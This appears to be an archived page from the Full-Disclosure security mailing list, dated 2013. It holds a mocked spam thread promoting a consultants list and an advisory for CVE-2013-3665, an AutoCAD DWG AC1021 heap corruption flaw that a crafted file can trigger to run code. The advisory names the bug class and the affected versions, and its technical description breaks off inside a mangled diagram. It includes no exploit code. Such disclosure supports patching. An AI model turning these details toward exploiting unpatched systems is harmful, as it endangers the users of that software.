I figured out a simple way to organize and get you on the Top 100 Infosec
Consultants List at:
-
http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/


Just add your name, url, and avatar to this google docs form and I'll just
copy-paste you into the list as I delete some of the guys on the list who
aren't looking for clients...

here it is... http://bit.ly/13bBB8E

Robert Kim
http://sparkah.com
San Diego, CA
310 598 1606

On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki
julius.kivim...@gmail.comwrote:

 Why am I not surprised vulnlab is the first one to post here to advertise
 themselves?


 2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com

 http://www.evolution-sec.com
 International Team, Top Researchers and Consultants, Certified
 Consultants, Public References and Information.

 ~bkm

 --
 VULNERABILITY LABORATORY RESEARCH TEAM
 DOMAIN: www.vulnerability-lab.com
 CONTACT: resea...@vulnerability-lab.com


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
Robert Q Kim
SEO Marketing Advisor Google Page 1
http://sparkah.com/google
2611 S Coast Highway
San Diego, CA 92007
310 598 1606
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Gary Baribault
You're not too terribly quick are you???

Gary B


 On 07/24/2013 06:31 PM, Bob iPhone Kim wrote:
 OK... guys...

 I figured out a simple way to organize and get you on the Top 100
 Infosec Consultants List at:
 - 
 http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/
  

 Just add your name, url, and avatar to this google docs form and I'll
 just copy-paste you into the list as I delete some of the guys on the
 list who aren't looking for clients...

 here it is... http://bit.ly/13bBB8E

 Robert Kim
 http://sparkah.com
 San Diego, CA
 310 598 1606

 On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki
 julius.kivim...@gmail.com mailto:julius.kivim...@gmail.com wrote:

 Why am I not surprised vulnlab is the first one to post here to
 advertise themselves?


 2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com
 mailto:resea...@vulnerability-lab.com

 http://www.evolution-sec.com
 International Team, Top Researchers and Consultants, Certified
 Consultants, Public References and Information.

 ~bkm

 --
 VULNERABILITY LABORATORY RESEARCH TEAM
 DOMAIN: www.vulnerability-lab.com
 http://www.vulnerability-lab.com
 CONTACT: resea...@vulnerability-lab.com
 mailto:resea...@vulnerability-lab.com


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 -- 
 Robert Q Kim
 SEO Marketing Advisor Google Page 1
 http://sparkah.com/google
 2611 S Coast Highway
 San Diego, CA 92007
 310 598 1606


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2013-3665 - AutoCAD DWG-AC1021 Memory Corruption

2013-07-24 Thread Felipe Manzano
Upgrade your autocad or DWG relatred software:

Original advisory:
http://usa.autodesk.com/adsk/servlet/ps/dl/item?id=21972896linkID=9240618siteID=123112


Title: AutoCAD DWG-AC1021 Heap Corruption
Product: Autodesk AutoCAD
Advisory ID: BINA-20130724
CVE ID: CVE-2013-3665
Class: Boundary Error Condition (Buffer Overflow)
Vulnerability class: Client side/ file format
Permalink: http://binamuse.com/advisories/BINA-20130724.txt
Vendor notified on: 2013-03-27
Patch/Fix Released: 2013-07-10
Advisory Published: 2013-07-24

Vulnerability Description:

 AutoCAD is a software for computer-aided design (CAD) and technical
drawing in
 2D/3D, being one of the world leading CAD design tools. It is developed and
 sold by Autodesk, Inc.

 AutoCad is vulnerable to an arbitrary pointer dereference vulnerability,
which
 can be exploited by malicious remote attackers to compromise a user's
system.
 This issue is due to AutoCad's failure to properly bounds-check data in a
DWG
 file before using it to index and copy heap memory values. This can be
exploi-
 ted to execute arbitrary code by opening a specially crafted DWG file,
version
 AC1021.

 This version was the native fileformat of AutoCAD Release 2007. New
versions of
 the format emerged but AC1021 is still supported in modern AutoCADs for
back-
 ward compatibility.

Vulnerable Packages:

 AutoCAD(R) 2014
 AutoCAD(R) 2013
 AutoCAD(R) 2012
 AutoCAD(R) 2011
 AutoCAD(R) Architecture 2014
 AutoCAD(R) Architecture 2013
 AutoCAD(R) Architecture 2012
 AutoCAD(R) Architecture 2011
 AutoCAD(R) Civil 3D(R) 2014
 AutoCAD(R) Civil 3D(R) 2013
 AutoCAD(R) Civil 3D(R) 2012
 AutoCAD(R) Civil 3D(R) 2011
 AutoCAD(R) ecscad 2014
 AutoCAD(R) ecscad 2013
 AutoCAD(R) ecscad 2012
 AutoCAD(R) ecscad 2011
 AutoCAD(R) Electrical 2014
 AutoCAD(R) Electrical 2013
 AutoCAD(R) Electrical 2012
 AutoCAD(R) Electrical 2011
 AutoCAD LT(R) 2014
 AutoCAD LT(R) 2013
 AutoCAD LT(R) 2012
 AutoCAD LT(R) 2011
 AutoCAD(R) Map 3D 2014
 AutoCAD(R) Map 3D 2013
 AutoCAD(R) Map 3D 2012
 AutoCAD(R) Map 3D 2011
 AutoCAD(R) Mechanical 2014
 AutoCAD(R) Mechanical 2013
 AutoCAD(R) Mechanical 2012
 AutoCAD(R) Mechanical 2011
 AutoCAD(R) MEP 2014
 AutoCAD(R) MEP 2013
 AutoCAD(R) MEP 2012
 AutoCAD(R) MEP 2011
 AutoCAD(R) PID 2014
 AutoCAD(R) PID 2013
 AutoCAD(R) PID 2012
 AutoCAD(R) PID 2011
 AutoCAD(R) Plant 3D 2014
 AutoCAD(R) Plant 3D 2013
 AutoCAD(R) Plant 3D 2012
 AutoCAD(R) Plant 3D 2011
 AutoCAD(R) Structural Detailing 2014
 AutoCAD(R) Structural Detailing 2013
 AutoCAD(R) Structural Detailing 2012
 AutoCAD(R) Structural Detailing 2011
 AutoCAD(R) Utility Design 2014
 AutoCAD(R) Utility Design 2012
 DWG TrueView(TM) 2014
 DWG TrueView(TM) 2013
 DWG TrueView(TM) 2012
 DWG TrueView(TM) 2011

Not Vulnerable Packages:

 None

Solution/Vendor Information/Workaround:

 http://images.autodesk.com/adsk/files/CodeExecutionVulnerabilityHotfix.exe

Credits:

 This vulnerability was found by  Joshep J. Cortez Sanchez of the
 Binamuse Vulnerability Research Team, http://binamuse.com

Technical Description:

 The R2007 dwg format is composed by sections and pages. Sections come in
two
 flavors system sections and data sections. The system sections contain
informa-
 tion about where the data sections and their pages are in the file.

 The system sections are built based in two main data structures: a first
header
 and a second header. In addition, there are two important sections in the
file
 structure, the page map and the section map. Each one of this sections
should
 be decoded using Reed Solomon algorithm and optionally be compressed with a
 proprietary algorithm (which we will ignore).

 The file structure looks like this:


+--DWG-+
  | +-+ +-+
+--+ |
  | |   1st Header| |   Page Map  | |   Sections Map
| |
  | +--+--+ +-+
+--+ |
  +--- |
+
   |

   | Reed Solomon

   |

  +V--+  +--|
  |
  |   |  |   |
  |
  |Header Values  |  |
+---+
  |   |  |   |   Page Count
 |
  +---+  | Decompress
 +---+
  | Header CRC|  |   |   Page Max ID
  |
  +---+  |
+---+
  |   |  |   |
  |
  |Second Header  |  |
+---+
  |(Compressed)   +--+   |   Page Map
Offset |
  |   |
 +---+
  +---+  |   Page Map Len
 |
  |  Second Header

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Tweedle Doh
On Wed, Jul 24, 2013 at 11:40 PM, Gary Baribault g...@baribault.net wrote:

 On 07/24/2013 06:31 PM, Bob iPhone Kim wrote:

 OK... guys...


 I figured out a simple way to organize and get you
 on the Top 100 Infosec Consultants List

 You're not too terribly quick are you???

He's a SEO Marketing Advisor and he has a 5 man crackerjack
programming team .. I think it must be serious :-)

Tweedle
--
You will lose an important disk file.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/